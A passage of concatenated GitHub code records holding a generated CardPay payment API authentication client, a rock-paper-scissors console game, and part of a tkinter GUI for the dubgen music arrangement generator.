numbers.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"29125769774","text":"# coding: utf-8\n\n\"\"\"\n CardPay REST API\n\n Welcome to the CardPay REST API. The CardPay API uses HTTP verbs and a [REST](https://en.wikipedia.org/wiki/Representational_state_transfer) resources endpoint structure (see more info about REST). Request and response payloads are formatted as JSON. Merchant uses API to create payments, refunds, payouts or recurrings, check or update transaction status and get information about created transactions. In API authentication process based on [OAuth 2.0](https://oauth.net/2/) standard. For recent changes see changelog section. # noqa: E501\n\n OpenAPI spec version: 3.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\nimport re # noqa: F401\n\n# python 2 and python 3 compatibility library\nimport six\n\nfrom cardpay.api_client import ApiClient\n\n\nclass AuthApi(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n Ref: https://github.com/swagger-api/swagger-codegen\n \"\"\"\n\n def __init__(self, api_client=None):\n if api_client is None:\n api_client = ApiClient()\n self.api_client = api_client\n\n def obtain_tokens(self, grant_type, **kwargs): # noqa: E501\n \"\"\"Get authorization token # noqa: E501\n\n :param str grant_type: Token request credentials representation (required)\n :param str password: Terminal password value (only for [password] grant type)\n :param str refresh_token: Refresh token string (only for [refresh_token] grant type)\n :param str terminal_code: Terminal code value\n :return: ApiTokens\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs[\"_return_http_data_only\"] = True\n\n (data) = self.obtain_tokens_with_http_info(grant_type, **kwargs) # noqa: E501\n return data\n\n def obtain_tokens_with_http_info(self, grant_type, **kwargs): # noqa: E501\n \"\"\"Get authorization token # noqa: E501\n\n :param str grant_type: Token request credentials representation (required)\n :param str password: Terminal password value (only for [password] grant type)\n :param str refresh_token: Refresh token string (only for [refresh_token] grant type)\n :param str terminal_code: Terminal code value\n :return: ApiTokens\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n\n all_params = [\n \"grant_type\",\n \"password\",\n \"refresh_token\",\n \"terminal_code\",\n ] # noqa: E501\n all_params.append(\"_return_http_data_only\")\n all_params.append(\"_preload_content\")\n all_params.append(\"_request_timeout\")\n\n params = locals()\n for key, val in six.iteritems(params[\"kwargs\"]):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method obtain_tokens\" % key\n )\n params[key] = val\n del params[\"kwargs\"]\n # verify the required parameter 'grant_type' is set\n if \"grant_type\" not in params or params[\"grant_type\"] is None:\n raise ValueError(\n \"Missing the required parameter `grant_type` when calling `obtain_tokens`\"\n ) # noqa: E501\n\n collection_formats = {}\n\n path_params = {}\n\n query_params = []\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n if \"grant_type\" in params:\n form_params.append((\"grant_type\", params[\"grant_type\"])) # noqa: E501\n if 
\"password\" in params:\n form_params.append((\"password\", params[\"password\"])) # noqa: E501\n if \"refresh_token\" in params:\n form_params.append((\"refresh_token\", params[\"refresh_token\"])) # noqa: E501\n if \"terminal_code\" in params:\n form_params.append((\"terminal_code\", params[\"terminal_code\"])) # noqa: E501\n\n body_params = None\n # HTTP header `Accept`\n header_params[\"Accept\"] = self.api_client.select_header_accept(\n [\"application/json\"]\n ) # noqa: E501\n # HTTP header `Content-Type`\n header_params[\n \"Content-Type\"\n ] = self.api_client.select_header_content_type( # noqa: E501\n [\"application/x-www-form-urlencoded\"]\n ) # noqa: E501\n\n return self.api_client.call_api(\n \"/api/auth/token\",\n \"POST\",\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type=\"ApiTokens\", # noqa: E501\n _return_http_data_only=params.get(\"_return_http_data_only\"),\n _preload_content=params.get(\"_preload_content\", True),\n _request_timeout=params.get(\"_request_timeout\"),\n collection_formats=collection_formats,\n )\n","repo_name":"cardpay/python-sdk-v3","sub_path":"cardpay/api/auth_api.py","file_name":"auth_api.py","file_ext":"py","file_size_in_byte":5123,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"29865775329","text":"import random\nrounds=int(input(\"how many rounds you want to play ? :\"))\nscore=0\nfor i in range(rounds):\n user_input=input(\" press 'r' for rock,'p' for paper,'s' for scissor\\n your choice : \")\n if user_input ==\"r\" or user_input ==\"p\" or user_input ==\"s\" :\n\n elements=[\"r\",\"p\",\"s\"]\n comp=random.choice(elements)\n else: \n print(\"invalid input\")\n break\n if user_input==comp: \n print(\"comp chose :\",comp)\n print(\"draw\")\n elif (user_input==\"r\" and comp==\"p\") or (user_input==\"p\" and comp==\"s\") or (user_input==\"s\" and comp==\"r\") : \n print(\"comp chose :\",comp)\n print(\"comp won \")\n \n else: \n print(\"comp chose :\",comp)\n print(\"you won \")\n score+=1\nif (score==rounds/2): \n print(\"Its a Draw with a score of \",score) \nelif (score>=rounds/2):\n print(\"you won with a score of \",score)\nelse:\n print(\"you lost with a score of score\",score)","repo_name":"Alonewolf2004/smartquizwithlifeline","sub_path":"rockpaper.py","file_name":"rockpaper.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18716567204","text":"\"\"\"\nCreated on Wed Aug 3 13:36:40 2022\n\n@author: João Paixão\n@email: joao.p.paixao@tecnico.ulisboa.pt\n\n@brief: Graphical User Interface\n\"\"\"\n\n\nimport tkinter as tk \nfrom tkinter import font as tkfont \nimport threading\n\nfrom PIL import ImageTk, Image\n\nimport os\nimport sys\n\n#so that pygame doesn't print anything\ndevnull = open(os.devnull, 'w')\nsys.stdout = devnull\nimport pygame\nsys.stdout = sys.__stdout__\n\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\"\n\nimport warnings\n\nclass App(tk.Tk):\n\n def __init__(self, *args, **kwargs):\n tk.Tk.__init__(self, *args, **kwargs)\n\n self.shared_data = {\n \"main_path\": os.getcwd().replace('\\\\','/'),\n \"bpm\": tk.IntVar(),\n 'train' : tk.BooleanVar(),\n 'mod': tk.DoubleVar(),\n 'fb': tk.IntVar(),\n 'section_size': tk.IntVar()}\n\n \n self.title_font = tkfont.Font(family='Helvetica', size=38,\n weight=\"bold\", slant=\"italic\")\n\n # the container is where we'll stack a 
bunch of frames\n        # on top of each other, then the one we want visible\n        # will be raised above the others\n        container = tk.Frame(self)\n        container.pack(side=\"top\", fill=\"both\", expand=True)\n        #container.grid(row=0, column=3, sticky=\"nsew\")\n        container.grid_rowconfigure(0, weight=1)\n        container.grid_columnconfigure(2, weight=2)\n\n\n        self.frames = {}\n        for F in (StartPage, PageOne, PageOne2, PageTwo, PageThree, PageFour,\n                  PageFive, PageSix, PageSeven, PageEight, PageNine, PageTen,\n                  \n                  INFO_MOD_LEVEL, INFO_SECTION_SIZE, INFO_MOD_FEEDBACK,\n                  INFO_CUSTOMIZE_PARAMETERS, INFO_CUTOFF, INFO_LFO, \n                  INFO_LFO_SHAPE_EVO, INFO_GRAIN_SIZE, INFO_GRAIN_SPACE,\n                  INFO_GRAIN_ORDER, INFO_SMOOTHING, INFO_EVEN_SPACING,\n                  INFO_SIGNAL_SHAPE_EVO):\n            \n            page_name = F.__name__\n            frame = F(parent=container, controller=self)\n            self.frames[page_name] = frame\n\n            # put all of the pages in the same location;\n            # the one on the top of the stacking order\n            # will be the one that is visible.\n            frame.grid(row=0, column=2, sticky=\"nsew\")\n            \n            #frame.pack(side=\"top\", fill=\"both\", expand=True)\n            #frame.grid_rowconfigure(0, weight=1)\n            #frame.grid_columnconfigure(0, weight=1)\n\n        self.show_frame(\"StartPage\")\n\n    def show_frame(self, page_name):\n        '''Show a frame for the given page name'''\n        frame = self.frames[page_name]\n        frame.tkraise()\n\n\nclass StartPage(tk.Frame):\n\n    def __init__(self, parent, controller):\n        tk.Frame.__init__(self, parent)\n        self.controller = controller\n        \n        controller.title(\"dubgen\")\n        controller.geometry(\"700x500\")\n        controller.config(bg=\"blue\") \n        \n        label = tk.Label(self, text=\"dubgen\", font=controller.title_font, fg=\"#1c4966\")\n        #label.pack(side=\"top\", fill=\"x\", pady=10)\n        label.pack(fill=\"both\", expand=True)\n        \n        slogan = tk.Label(self, text=\"Sampler and MIDI Arrangement Generator\",\n                          font=('Helvetica', 18))\n        slogan.pack( expand=True)\n\n        button1 = tk.Button(self, text=\"Next\", font=('Helvetica', 18),\n                            command=lambda: controller.show_frame(\"PageOne\"))\n\n        button1.pack( expand=True)\n\n\nclass PageOne(tk.Frame):\n\n    def __init__(self, parent, controller):\n        tk.Frame.__init__(self, parent)\n        self.controller = controller\n        row=0\n\n        label = tk.Label(self, text=\"How it works:\", font=controller.title_font)\n        label.pack(side=\"top\", pady=10)\n        row+=1\n        \n        text1=\"dubgen creates monophonic samples from given sounds, modifies MIDI compositions, and then chooses a sequence of samples to generate an arrangement (new MIDI + samples)\"\n        text2 = 'Created samples can also be modulated by a Synthesizer' \n\n        explanation1 = tk.Label(self, text=text1,\n                               font=('Helvetica', 18, 'bold'), wraplength=500)\n        explanation1.pack(expand=True)\n        row+=1\n        \n        \n        explanation2 = tk.Label(self, text=text2,\n                               font=('Helvetica', 18, 'bold'), wraplength=500)\n        explanation2.pack(expand=True)\n        row+=1\n\n\n        button = tk.Button(self, text=\"Next\", font=('Helvetica', 18),\n                           command= lambda: controller.show_frame(\"PageOne2\"))\n        button.pack(expand=True, side='right', pady=20)\n        row+=1\n\nclass PageOne2(tk.Frame):\n\n    def __init__(self, parent, controller):\n        tk.Frame.__init__(self, parent)\n        self.controller = controller\n        row=0\n\n        label = tk.Label(self, text=\"How it works:\", font=controller.title_font)\n        label.pack(side=\"top\", pady=10)\n        row+=1\n        \n        text1=\"Your input:\"\n        text1_1='(Go to \".../dubgen_APP/user\" folder)'\n        text2=\"1. Folders with sounds for three instruments (Bass, Harmony and Melody);\\n\"\n        text2_2=\"2. 
Three MIDI files, one for each instrument.\"\n text3=\"dubgen's Output:\"\n text4=\"1. Folder with created samples;\\n\"\n text4_2=\"2. Three new MIDI files, one for each instrument;\\n\"\n text4_3='3. Wav and mp3 files of the generated Arrangement (with or without Synthesizer Processing).\\n'\n\n explanation1 = tk.Label(self, text=text1,\n font=('Helvetica', 18, 'bold'))#, justify=\"left\", wraplength=500)\n explanation1.pack(expand=True)\n row+=1\n \n explanation1_1 = tk.Label(self, text=text1_1,\n font=('Helvetica', 10, 'bold',\"italic\"), fg=\"#1c4966\")#, justify=\"left\", wraplength=500)\n explanation1_1.pack(expand=True)\n row+=1\n\n\n text_box = tk.Text(self)\n text_box.insert('end', text2)\n text_box.insert('end', text2_2)\n text_box.pack(expand=True)\n text_box.configure(state='disabled', height=5, width=50)\n row+=1\n \n explanation2 = tk.Label(self, text=text3,\n font=('Helvetica', 18, 'bold'))\n explanation2.pack(expand=True)\n row+=1\n\n text_box2 = tk.Text(self)\n text_box2.insert('end', text4)\n text_box2.insert('end', text4_2)\n text_box2.insert('end', text4_3)\n text_box2.pack(expand=True)\n text_box2.configure(state='disabled', height=5, width=50)\n row+=1\n\n button = tk.Button(self, text=\"Next\", font=('Helvetica', 18),\n command= lambda: controller.show_frame(\"PageTwo\"))\n button.pack(expand=True, side='right', pady=20)\n row+=1\n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command= lambda: controller.show_frame(\"PageOne\"))\n button.pack(expand=True, side='right', pady=20, padx=20)\n row+=1\n \n \n# funcs parameter will have the reference\n# of all the functions that are \n# passed as arguments i.e \"fun1\" and \"fun2\"\ndef combine_funcs(*funcs):\n \n # this function will call the passed functions\n # with the arguments that are passed to the functions\n def inner_combined_func(*args, **kwargs):\n for f in funcs:\n \n # Calling functions with arguments, if any\n f(*args, **kwargs)\n \n # returning the reference of inner_combined_func\n # this reference will have the called result of all\n # the functions that are passed to the combined_funcs\n return inner_combined_func\n\nclass user_input:\n def __init__(self, bpm, main_path, mod, fb, section_size):\n self.bpm = bpm\n self.main_path = main_path\n self.mod = mod\n self.fb = fb\n self.section_size = section_size\n\n\nclass PageTwo(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n # Create five columns\n for i in range(5):\n if i!=2:\n self.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n \n # Place widgets using grid()\n label1 = tk.Label(self, text=\" \")\n label1.grid(row=0, column=0)\n \n label2 = tk.Label(self, text=\" \")\n label2.grid(row=0, column=1)\n \n label3 = tk.Label(self, text=\" \")\n label3.grid(row=0, column=2)\n \n label4 = tk.Label(self, text=\" \")\n label4.grid(row=0, column=3)\n \n label5 = tk.Label(self, text=\" \")\n label5.grid(row=0, column=4)\n \n row = 1\n \n \n label = tk.Label(self, text=\"Settings\", font=controller.title_font)\n label.grid(row=row, column=2 , columnspan=1, sticky=\"nsew\")\n row+=1\n \n label_bpm = tk.Label(self, text='BPM', font=('Helvetica', \"12\"), justify=\"left\")\n label_bpm.grid(row=row, column=0, sticky = 'S')\n \n slider_length = 300\n \n self.controller.shared_data[\"bpm\"].set(120)\n bpm_entry = tk.Scale(self, variable= self.controller.shared_data[\"bpm\"],\n from_= 80, to = 200, resolution=1, orient=\"horizontal\",\n length = slider_length) \n 
bpm_entry.grid(row=row, column=2, columnspan=2)\n        \n        min_bpm = tk.Label(self, text='80', font=('Helvetica', \"10\"))\n        min_bpm.grid(row=row, column=1, sticky = 'SE')\n        \n        max_bpm = tk.Label(self, text='200', font=('Helvetica', \"10\"))\n        max_bpm.grid(row=row, column=4, sticky = 'SW')\n\n        row+=1\n        \n        #################### #mod level #############################\n        # Create a label for the slider\n        mod_label = tk.Label(self, text=\"Mod Level:\", font=('Helvetica', \"12\"), justify=\"left\")\n        mod_label.grid(row = row, column=0, padx=10)\n        \n        info1 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n                         command=lambda: controller.show_frame(\"INFO_MOD_LEVEL\"))\n        info1.grid(row=row, column=1, sticky = 'S')\n        \n        # Create a double variable to store the slider value\n        mod_var = tk.DoubleVar()\n        mod_var.set(0.7)  # Set an initial value for the slider\n        \n        min_mod = tk.Label(self, text='0.1', font=('Helvetica', \"10\"))\n        min_mod.grid(row=row, column=1, sticky = 'SE')\n        \n        max_mod = tk.Label(self, text='1', font=('Helvetica', \"10\"))\n        max_mod.grid(row=row, column=4, sticky = 'SW')\n        \n        # Create the slider widget\n        mod_slider = tk.Scale(self, variable=mod_var, from_= 0.1, to = 1.0, resolution=0.01,\n                              orient=\"horizontal\", \n                              length = slider_length)\n        mod_slider.grid(row = row, column=2, columnspan=2)\n        self.controller.shared_data['mod']=mod_var\n        row+=1\n        \n        #################### #mod feedback #############################\n        fb_label = tk.Label(self, text=\"Mod Feedback:\", font=('Helvetica', \"12\"), justify=\"left\")\n        fb_label.grid(row = row, column=0, padx=10, columnspan=2, sticky = 'W')\n        \n        info2 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n                         command=lambda: controller.show_frame(\"INFO_MOD_FEEDBACK\"))\n        info2.grid(row=row, column=1, sticky = 'S')\n        \n        # Create an integer variable to store the slider value\n        fb_var = tk.IntVar()\n        fb_var.set(1)  # Set an initial value for the slider\n        \n        min_fb = tk.Label(self, text='0', font=('Helvetica', \"10\"))\n        min_fb.grid(row=row, column=1, sticky = 'SE')\n        \n        max_fb = tk.Label(self, text='3', font=('Helvetica', \"10\"))\n        max_fb.grid(row=row, column=4, sticky = 'SW')\n        \n        # Create the slider widget\n        fb_slider = tk.Scale(self, variable=fb_var, from_= 0, to=3, orient=\"horizontal\",\n                             length=slider_length)\n        fb_slider.grid(row = row, column=2, columnspan=2)\n        self.controller.shared_data['fb']=fb_var\n        \n        row+=1\n        #################### #section_size #############################\n        sec_label = tk.Label(self, text=\"Section size\\n (Number of bars):\",\n                             font=('Helvetica', \"12\"), justify=\"left\")\n        sec_label.grid(row = row, column=0, padx=10,columnspan=2, sticky = 'W')\n        \n        info3 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n                         command=lambda: controller.show_frame(\"INFO_SECTION_SIZE\"))\n        info3.grid(row=row, column=1, sticky = 'S')\n        \n        # Create an integer variable to store the slider value\n        sec_var = tk.IntVar()\n        sec_var.set(8)  # Set an initial value for the slider\n        \n        min_sec = tk.Label(self, text='4', font=('Helvetica', \"10\"))\n        min_sec.grid(row=row, column=1, sticky = 'SE')\n        \n        max_sec = tk.Label(self, text='16', font=('Helvetica', \"10\"))\n        max_sec.grid(row=row, column=4, sticky = 'SW')\n        \n        # Create the slider widget\n        sec_slider = tk.Scale(self, variable=sec_var, from_= 4, to=16, resolution=4,\n                              orient=\"horizontal\", length=slider_length)\n        sec_slider.grid(row = row, column=2, columnspan=2)\n        self.controller.shared_data['section_size']=sec_var\n        \n        row+=1\n        \n        
############################## TRAIN CLASSIFICATION #####################################\n row+=1\n train_label = tk.Label(self, text='Custom Instrument\\n Classification',\n font=('Helvetica', \"10\") , justify=\"left\", wraplength=120)\n train_label.grid(row = row, column=0, pady=10, padx=10, columnspan=3, sticky = 'W')\n \n info = tk.Button(self, text=\"Info*\",\n command=lambda: controller.show_frame(\"PageThree\"))\n info.grid(row=row, column=2, pady=10, sticky = 'W')\n \n # Create a boolean variable to store the checkbox value\n train = tk.BooleanVar()\n \n # Create the checkbox\n train_checkbox = tk.Checkbutton(self,\n variable=train, compound=\"right\") #, anchor=\"w\"\n self.controller.shared_data['train']=train\n \n # Position the checkbox and filename entry widgets in the GUI window\n train_checkbox.grid(row=row, column=1, columnspan=1, pady=10, sticky = 'nsew')\n row+=1\n \n button2 = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageOne\"))\n \n button3 = tk.Button(self, text=\"Next\", font=('Helvetica', 18),\n command= lambda: controller.show_frame(\"PageFour\"))\n \n #button1.grid(row=row, column=0, pady=10)\n button2.grid(row=row, column=0, columnspan=2, pady=30, padx=20, sticky='w')\n button3.grid(row=row, column=4, pady=30, padx=20)\n\n #to join the two functions in a button: \n #combine_funcs(lambda: fun1(arguments), lambda: fun2(arguments))\n #https://www.geeksforgeeks.org/how-to-bind-multiple-commands-to-tkinter-button/\n \n\n \nclass PageThree(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n label = tk.Label(self, text=\"Train your own Model!\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text_train= 'Before picking samples for the final arrangement, we first have to classify all samples by Instrument Type.\\n'\n text_train2 = 'You can train your own Instrument Classification Model by placing Samples in each Instrument category (BASS, HARMONY and MELODY) on the folders at \".../dubgen_APP/user/train_sounds\"'\n \n train_info = tk.Label(self, text=text_train,\n font=('Helvetica', 18), wraplength=500)\n train_info.pack(expand=True, padx=20)\n \n train_info2 = tk.Label(self, text=text_train2,\n font=('Helvetica', 18), wraplength=500)\n train_info2.pack(expand=True, padx=20)\n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageTwo\"))\n button.pack(expand=True, padx=20)\n \n \nclass PageFour(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n row=0\n \n label = tk.Label(self, text=\"Create Arrangement!\", font=controller.title_font) \n #label.grid(row=row, column=0 , columnspan=3, sticky=\"nsew\", pady=100)\n row+=1 \n label.pack(side=\"top\", fill=\"both\", pady=10, expand=True)\n \n self.button1 = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageTwo\"))\n \n self.t1=threading.Thread(target=self.run_sampling) #init thread\n \n self.button2 = tk.Button(self, text=\"Start\", font=('Helvetica', 18),\n command= combine_funcs(self.Threading,\n lambda: self.button2.config(text=\"Creating...\", state=tk.DISABLED, width=35)))\n \n self.button2.pack( pady=10, expand=True)\n row+=1\n self.button1.pack( pady=10, expand=True, side='left')\n \n #self.out_sampling = {'midi_list': list()}\n self.out_ga = {'music_path': 'init', 
'best_score': float(0.0)}\n        \n        \n    def Threading(self):\n        # Call work function\n        self.event = threading.Event()\n\n        self.t1.start()\n        \n    def run_sampling(self): \n        path = self.controller.shared_data[\"main_path\"]\n        bpm = self.controller.shared_data[\"bpm\"].get()\n        mod = self.controller.shared_data[\"mod\"].get()\n        fb = self.controller.shared_data[\"fb\"].get()\n        section_size = self.controller.shared_data[\"section_size\"].get()\n        \n        user_data = user_input(bpm, path, mod, fb, section_size)\n        \n        self.button1.configure(text = \"Go Back\", state= tk.DISABLED)\n\n        from main import Sampling_and_Mod\n        train_bool=self.controller.shared_data['train'].get()\n        \n        if train_bool==True:\n            train=1\n        else: train=0\n\n        \n        user_info, midi_info_out, sample_info, sample_train_info, section_info, midi_info_real = Sampling_and_Mod(user_data, self.event ,\n                                                                              train, self.button2)\n        \n        \n        self.out_sampling = {'user_info': user_info, 'midi_info_out': midi_info_out,\n                             'sample_info': sample_info, 'sample_train_info': sample_train_info,\n                             'section_info': section_info, 'midi_info_real': midi_info_real}\n        \n        \n        ######################################### GA PREPOP ###################################################\n        \n        self.in_pp = self.out_sampling #input genetic\n        \n        from main import main_GA_PREPOP\n        info_GA, class_idx, Pop, df = main_GA_PREPOP(self.in_pp['user_info'],\n                          self.in_pp['midi_info_out'], self.in_pp['sample_info'], self.button2)\n        \n        \n        self.out_ga_prepop = {'info_GA': info_GA , 'class_idx': class_idx , 'Pop': Pop , 'df': df}\n        \n        self.in_gen1 = self.out_ga_prepop #input genetic from prepop\n        self.in_gen2 = self.out_sampling #input genetic from sampling\n\n        \n        ######################################### GA ###################################################\n        from main import main_GA\n        music_path, best_score, sample_Ind = main_GA(self.in_gen2['user_info'], self.in_gen2['sample_info'],\n                          self.in_gen1['class_idx'], self.in_gen2['midi_info_out'],\n                          self.in_gen1['Pop'], self.in_gen1['df'], self.in_gen1['info_GA'],\n                          self.in_gen2['midi_info_real'], self.button2)\n        \n        \n        self.out_ga = {'music_path': music_path, 'best_score': best_score, 'sample_Ind': sample_Ind}\n        #'''\n        \n        \n        #reconfigure button to pass to next phase\n        self.button2.configure(text = \"Listen to Arrangement!\", font=('Helvetica', 16),\n                               command = lambda: self.controller.show_frame(\"PageFive\"),\n                               state=tk.NORMAL, width=25)\n        \n\n        \n    def stop_thread(self): #stop the thread\n        self.button2.configure(text = \"Stopping Thread...\", state= tk.DISABLED)\n        \n        if self.t1.is_alive():\n            self.event.set()\n            print('Stopping Thread...')\n            self.t1.join() #wait for thread to end \n        \n        self.button2.configure(text = \"Stop\", state= tk.NORMAL)\n\n\n    def change_layout4(self):\n        self.button2.configure(text = \"Stop\", command = self.stop_thread)\n\n        \nclass PageFive(tk.Frame):\n\n    def __init__(self, parent, controller):\n        tk.Frame.__init__(self, parent)\n        self.controller = controller\n        \n        # Create seven columns\n        for i in range(7):\n            self.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n        \n        # Give the center column a weight of 1\n        #self.grid_columnconfigure(2, weight=1)\n        \n        # Place widgets using grid()\n        label1 = tk.Label(self, text=\" \")\n        label1.grid(row=0, column=0)\n        \n        label2 = tk.Label(self, text=\" \")\n        label2.grid(row=0, column=1)\n        \n        label3 = tk.Label(self, text=\" \")\n        label3.grid(row=0, column=2)\n        \n        label4 = tk.Label(self, text=\" \")\n        label4.grid(row=0, column=3)\n        \n        label5 = tk.Label(self, text=\" \")\n        label5.grid(row=0, column=4)\n        \n        label6 
= tk.Label(self, text=\" \")\n label6.grid(row=0, column=5)\n \n label7 = tk.Label(self, text=\" \")\n label7.grid(row=0, column=6)\n \n row=1\n \n label = tk.Label(self, text=\"Listen to the Arrangement\", font=controller.title_font)\n label.grid(row=row, column=0, columnspan=7, pady=10)\n row+=1\n \n main_path = self.controller.shared_data[\"main_path\"]\n \n #create playlist mixer\n self.mixer = pygame.mixer\n self.mixer.init()\n\n\n ###################################### icons ####################################\n #icon_path = main_path + '/GUI/icons/'\n icon_path = main_path + '/icons/'\n \n play_img = Image.open(icon_path + 'play.png')\n pause_img = Image.open( icon_path + 'pause.png')\n stop_img = Image.open( icon_path + 'stop.png')\n backward_img = Image.open( icon_path + 'backward.png')\n forward_img = Image.open( icon_path + 'forward.png')\n \n play_img = play_img.resize((20, 20))\n pause_img = pause_img.resize((20, 20))\n stop_img = stop_img.resize((20, 20))\n backward_img = backward_img.resize((20, 20))\n forward_img = forward_img.resize((20, 20))\n \n play_icon = ImageTk.PhotoImage(image = play_img, master = controller)\n pause_icon = ImageTk.PhotoImage(image = pause_img, master = controller)\n stop_icon = ImageTk.PhotoImage(image = stop_img, master = controller)\n backward_icon = ImageTk.PhotoImage(image = backward_img, master = controller)\n forward_icon = ImageTk.PhotoImage(image = forward_img, master = controller)\n \n ########################################## mp3 #######################################\n mp3_frame = tk.Frame(self, padx=10, pady=10,\n highlightbackground=\"black\", highlightthickness=1)\n mp3_frame.grid(row=row, column=1, columnspan=5, pady=10, sticky='nsew')\n \n for i in range(5):\n mp3_frame.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n \n pady_mp3 = 20\n \n self.paused = False\n self.save_start = 0\n \n play_btn = tk.Button(mp3_frame, image=play_icon, borderwidth=0, command= self.Play_Song)\n pause_btn = tk.Button(mp3_frame, image=pause_icon, borderwidth=0, command= self.Pause_Song)\n stop_btn = tk.Button(mp3_frame, image=stop_icon, borderwidth=0, command= self.Stop_Song)\n backward_btn = tk.Button(mp3_frame, image=backward_icon, borderwidth=0, command= self.Backward_Song)\n forward_btn = tk.Button(mp3_frame, image=forward_icon, borderwidth=0, command= self.Forward_Song)\n \n play_btn.image = play_icon\n pause_btn.image = pause_icon\n stop_btn.image = stop_icon\n backward_btn.image = backward_icon\n forward_btn.image = forward_icon\n \n backward_btn.grid(row = row, column = 0, pady=pady_mp3, sticky='nsew')\n stop_btn.grid(row = row, column = 1, pady=pady_mp3, sticky='nsew')\n play_btn.grid(row = row, column = 2, pady=pady_mp3, sticky='nsew')\n pause_btn.grid(row = row, column = 3, pady=pady_mp3, sticky='nsew')\n forward_btn.grid(row = row, column = 4, pady=pady_mp3, sticky='nsew')\n \n row+=1\n \n ######################################## volume #######################################\n \n def set_volume(val):\n volume = float(val) / 100\n self.mixer.music.set_volume(volume)\n \n label_vol = tk.Label(mp3_frame, text=\"Volume\", font=('Helvetica', 16))\n label_vol.grid(row=row, column=0, columnspan=5, sticky='s')\n row+=1\n \n vol_slider = tk.Scale(mp3_frame, from_=0, to=100, orient='horizontal', command= set_volume,\n length= 300)\n vol_slider.set(50)\n vol_slider.grid(row = row, column=1, columnspan=3)#, pady=10)\n row+=1\n \n ######################################################################################\n \n go_synth = 
tk.Button(self, text=\"Go to Synthesizer\", font=('Helvetica', 18),\n                           command=lambda: controller.show_frame(\"PageSix\"))\n        go_synth.grid(row = row, column=4, columnspan=2, pady=50, sticky='E')\n        \n        def close_window():\n            self.controller.destroy()\n        \n        close_button = tk.Button(self, text=\"Close\", font=('Helvetica', 18),\n                                 command=close_window)\n        close_button.grid(row = row, column=3, columnspan=1, pady=50)\n        row+=1\n        \n    def Play_Song(self):\n        self.results = self.controller.frames['PageFour'].out_ga\n        song_path = self.results['music_path']\n        #print('music path: ', song_path)\n        \n        self.mixer.music.load(song_path)\n        self.mixer.music.play(loops=0)\n        \n    def Stop_Song(self):\n        self.mixer.music.stop()\n        \n        self.save_start = 0 #reset the stored resume position\n        \n    def Pause_Song(self):\n        \n        if self.paused:\n            #unpause \n            self.mixer.music.unpause()\n            self.paused = False\n        else:\n            #pause\n            self.mixer.music.pause()\n            self.paused = True\n        \n    def Forward_Song(self):\n        \n        start = self.save_start\n        \n        play_time = self.mixer.music.get_pos()\n\n        start += (play_time/1000.0) + 5\n        \n        self.mixer.music.pause()\n        \n        self.save_start = start\n        #print('Current Time in Song:', start)\n        \n        self.mixer.music.play(loops=0, start = start)\n        \n    def Backward_Song(self):\n        start = self.save_start\n        \n        play_time = self.mixer.music.get_pos()\n\n        start += (play_time/1000.0) - 5\n        \n        # mixer.music.pause()\n        self.mixer.music.pause()\n        \n        self.save_start = start\n        #print('Current Time in Song:', start)\n        \n        self.mixer.music.play(loops=0, start = start)\n        \n    def set_volume(self):\n        volume = float(self.vol) / 100\n        self.mixer.music.set_volume(volume)\n        \n        \nclass PageSix(tk.Frame): \n\n    def __init__(self, parent, controller):\n        tk.Frame.__init__(self, parent)\n        self.controller = controller\n        \n        # Create seven columns\n        for i in range(7):\n            self.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n        \n        # Place widgets using grid()\n        label1 = tk.Label(self, text=\" \")\n        label1.grid(row=0, column=0)\n        \n        label2 = tk.Label(self, text=\" \")\n        label2.grid(row=0, column=1)\n        \n        label3 = tk.Label(self, text=\" \")\n        label3.grid(row=0, column=2)\n        \n        label4 = tk.Label(self, text=\" \")\n        label4.grid(row=0, column=3)\n        \n        label5 = tk.Label(self, text=\" \")\n        label5.grid(row=0, column=4)\n        \n        label6 = tk.Label(self, text=\" \")\n        label6.grid(row=0, column=5)\n        \n        label7 = tk.Label(self, text=\" \")\n        label7.grid(row=0, column=6)\n        \n        row=1\n        \n        label = tk.Label(self, text=\"Synthesizer\", font=controller.title_font)\n        label.grid(row=row, column=2, columnspan=3)\n        row+=1\n        \n        #maximum number of sections (that can be parameterized)\n        self.max_sections = 5\n        \n        ############################# Customize Parameters ###############################\n        def toggle_buttons():\n            if self.custom.get():\n                synth_af.config(state=tk.NORMAL)\n                synth_gr.config(state=tk.NORMAL)\n                synth_ip.config(state=tk.NORMAL)\n                \n                menu_af.config(state=tk.NORMAL)\n                